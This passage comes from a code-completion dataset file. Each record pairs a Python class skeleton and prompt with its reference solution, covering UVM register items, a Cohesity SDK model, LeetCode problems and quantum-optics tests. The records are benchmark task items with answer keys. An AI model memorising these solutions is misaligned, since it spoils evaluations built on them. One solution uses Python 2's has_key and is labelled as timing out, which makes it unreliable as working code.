not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n<|end_body_2|>\n", "revision_id": "fc5f955701b2b56c1fddac195c70cb3ebb9139fe", "skeleton": "<|skeleton|>\nclass UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\"\"\"\n <|body_0|>\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n <|body_1|>\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. 
Args: name (str): Name of the instance\"\"\"\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n", "source": "the_stack_v2_python_sparse", "source_path": "src/uvm/reg/uvm_reg_item.py", "source_repo": "tpoikela/uvm-python", "split": "test", "star_events_count": 199} {"blob_id": "7328b07eaa3c2cc5d17279e58805e6692ec46465", "bodies": ["self.dest_guid = dest_guid\nself.object_flags = object_flags\nself.property_status_vec = property_status_vec\nself.source_guid = source_guid\nself.status = status\nself.timetaken_ms = timetaken_ms", "if dictionary is None:\n return None\ndest_guid = dictionary.get('destGuid')\nobject_flags = dictionary.get('objectFlags')\nproperty_status_vec = None\nif dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\nsource_guid = dictionary.get('sourceGuid')\nstatus = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\ntimetaken_ms = dictionary.get('timetakenMs')\nreturn cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)"], 
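The two ADObjectRestoreStatus bodies just listed form the usual Cohesity SDK model pair: a keyword constructor over snake_case attributes and a from_dictionary factory that translates the API's camelCase keys (destGuid, objectFlags, propertyStatusVec, sourceGuid, status, timetakenMs) and recurses into nested models. A hedged usage sketch, assuming the import path referenced inside the body and that from_dictionary is bound as a classmethod, as its cls parameter suggests:

# Import path inferred from the module references inside from_dictionary.
from cohesity_management_sdk.models.ad_object_restore_status import ADObjectRestoreStatus

payload = {
    'destGuid': 'guid-new',
    'sourceGuid': 'guid-old',
    'objectFlags': 0,
    'timetakenMs': 1250,
    # 'propertyStatusVec' and 'status' are optional; absent keys become None
}
obj = ADObjectRestoreStatus.from_dictionary(payload)
print(obj.dest_guid, obj.timetaken_ms)  # guid-new 1250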
"bodies_text": "<|body_start_0|>\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc", "class_name": "ADObjectRestoreStatus", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000113", "length_bytes": 4444, "license_type": "permissive", "methods": [{"docstring": "Constructor for the ADObjectRestoreStatus class", "name": "__init__", "signature": "def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006340", "prompt": "Implement the Python class `ADObjectRestoreStatus` described below.\n\nClass description:\nImplementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\n\nMethod signatures and docstrings:\n- def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None): Constructor for the ADObjectRestoreStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `ADObjectRestoreStatus` described below.\n\nClass description:\nImplementation of the 'ADObjectRestoreStatus' model. 
TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\n\nMethod signatures and docstrings:\n- def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None): Constructor for the ADObjectRestoreStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. 
sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/ad_object_restore_status.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "3c88f93df22dfcd613ae198b0733b3e1a3c96890", "bodies": ["self.d = {}\nfor i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]", "if value not in self.d.keys():\n return 0\nres = 0\nfor ind in self.d[value]:\n if left <= ind <= right:\n res += 1\nreturn res"], "bodies_text": "<|body_start_0|>\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]\n<|end_body_0|>\n\n<|body_start_1|>\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RangeFreqQuery", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RangeFreqQuery:\n\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n <|body_0|>\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]\n<|end_body_0|>\n\n<|body_start_1|>\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000114", "length_bytes": 1037, "license_type": "no_license", "methods": [{"docstring": ":type arr: List[int]", "name": "__init__", "signature": "def __init__(self, arr)"}, {"docstring": ":type left: int :type right: int :type value: int :rtype: int", "name": "query", "signature": "def 
query(self, left, right, value)"}], "n_methods": 2, "prompt": "Implement the Python class `RangeFreqQuery` described below.\n\nClass description:\nImplement the RangeFreqQuery class.\n\nMethod signatures and docstrings:\n- def __init__(self, arr): :type arr: List[int]\n- def query(self, left, right, value): :type left: int :type right: int :type value: int :rtype: int", "prompted_full_text": "Implement the Python class `RangeFreqQuery` described below.\n\nClass description:\nImplement the RangeFreqQuery class.\n\nMethod signatures and docstrings:\n- def __init__(self, arr): :type arr: List[int]\n- def query(self, left, right, value): :type left: int :type right: int :type value: int :rtype: int\n\n<|skeleton|>\nclass RangeFreqQuery:\n\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n <|body_0|>\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]\n<|end_body_0|>\n\n<|body_start_1|>\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n<|end_body_1|>\n", "revision_id": "ee59b82125f100970c842d5e1245287c484d6649", "skeleton": "<|skeleton|>\nclass RangeFreqQuery:\n\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n <|body_0|>\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RangeFreqQuery:\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "_CodeTopics/LeetCode_contest/weekly/weekly2021/268/TLE--268_3.py", "source_repo": "BIAOXYZ/variousCodes", "split": "test", "star_events_count": 0} {"blob_id": "cf0f0d60a1504f875cffb931bafc08cb7349e0e2", "bodies": ["self.max = float('-inf')\nself.helper(root)\nreturn self.max", "if node is None:\n return (float('-inf'), float('inf'))\nleft_max, left_min = self.helper(node.left)\nright_max, right_min = self.helper(node.right)\ndescent_max = max(left_max, right_max)\ndescent_min = min(left_min, right_min)\nif descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\nif descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\nreturn (max(descent_max, node.val), min(descent_min, node.val))"], "bodies_text": "<|body_start_0|>\n self.max = float('-inf')\n self.helper(root)\n return self.max\n<|end_body_0|>\n\n<|body_start_1|>\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = 
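Reviewer note on the RangeFreqQuery record above: `self.d.has_key(elem)` is Python 2 only and raises AttributeError on Python 3, and the linear scan over all positions of `value` per query is why the source path is tagged `TLE--268_3.py`. A hedged sketch of the standard O(log n)-per-query approach, assuming the usual LeetCode 2080 contract (indices counted inclusively in [left, right]):

from bisect import bisect_left, bisect_right
from collections import defaultdict

class RangeFreqQuery:
    def __init__(self, arr):
        # value -> sorted list of indices where it occurs
        self.pos = defaultdict(list)
        for i, v in enumerate(arr):
            self.pos[v].append(i)

    def query(self, left, right, value):
        idx = self.pos.get(value)
        if not idx:
            return 0
        # count indices in [left, right] with two binary searches
        return bisect_right(idx, right) - bisect_left(idx, left)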
max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter `node`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.max = float('-inf')\n self.helper(root)\n return self.max\n<|end_body_0|>\n\n<|body_start_1|>\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000115", "length_bytes": 2711, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: int", "name": "maxAncestorDiff", "signature": "def maxAncestorDiff(self, root)"}, {"docstring": "return the maximum and minimun node value of all descendants of parameter `node`", "name": "helper", "signature": "def helper(self, node)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000392", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAncestorDiff(self, root): :type root: TreeNode :rtype: int\n- def helper(self, node): return the maximum and minimun node value of all descendants of parameter `node`", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAncestorDiff(self, root): :type root: TreeNode :rtype: int\n- def helper(self, node): return the maximum and minimun node value of all descendants of parameter `node`\n\n<|skeleton|>\nclass Solution:\n\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter `node`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.max = float('-inf')\n self.helper(root)\n return self.max\n<|end_body_0|>\n\n<|body_start_1|>\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n<|end_body_1|>\n", "revision_id": "34a78e06d493e61b21d4442747e9102abf9b319b", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter 
`node`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n self.max = float('-inf')\n self.helper(root)\n return self.max\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter `node`\"\"\"\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n", "source": "the_stack_v2_python_sparse", "source_path": "1026_Maximum_Differnce_Between_Node_and_Ancestor.py", "source_repo": "sunnyyeti/Leetcode-solutions", "split": "test", "star_events_count": 0} {"blob_id": "311b4c55f3f2c3d0fbc1a9d7913350227fabc42a", "bodies": ["np.random.seed(42)\nvac_modes = 1\nsq_r = 5.0\nc = 2\nshots = 100\nalpha = [0, np.pi / 4] * c\nphi = [np.pi / 2, 0] * c\ntheta = [np.pi / 2, 0, 0, np.pi / 2]\ntimebins_per_shot = len(alpha)\nsamples = singleloop(sq_r, alpha, phi, theta, shots)\nreshaped_samples = move_vac_modes(samples, 2, crop=True)\nX0 = reshaped_samples[:, 0, 0]\nX1 = reshaped_samples[:, 0, 1]\nP2 = reshaped_samples[:, 0, 2]\nP3 = reshaped_samples[:, 0, 3]\nrtol = 5 / np.sqrt(shots)\nminusstdX1X0 = (X1 - X0).var()\nplusstdX1X0 = (X1 + X0).var()\nsqueezed_std = np.exp(-2 * sq_r)\nexpected_minus = sf.hbar * squeezed_std\nexpected_plus = sf.hbar / squeezed_std\nassert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\nassert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\nminusstdP2P3 = (P2 - P3).var()\nplusstdP2P3 = (P2 + P3).var()\nassert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\nassert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)", "np.random.seed(42)\nvac_modes = 1\nn = 4\nshots = 100\nsq_r = 5\nalpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\nalpha[0] = 0.0\nphi = [0] * n\nphi[0] = np.pi / 2\ntimebins_per_shot = len(alpha)\ntheta = [0] * n\nsamples_X = singleloop(sq_r, alpha, phi, theta, shots)\nreshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\ntheta = [np.pi / 2] * n\nsamples_P = singleloop(sq_r, alpha, phi, theta, shots)\nreshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\nnullifier_X = lambda sample: (sample - sample[-1])[:-1]\nval_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\nassert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\nval_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\nassert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))", "np.random.seed(42)\nvac_modes = 1\nn = 20\nshots = 100\nsq_r = 3\nalpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\nalpha = [alpha_c] * n\nalpha[0] = 0.0\nphi = [np.pi / 2] * n\ntheta = [0, np.pi / 2] * (n // 2)\ntimebins_per_shot = len(alpha)\nreshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\nnullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\nnullifier_samples = np.array([nullifier(y[0]) 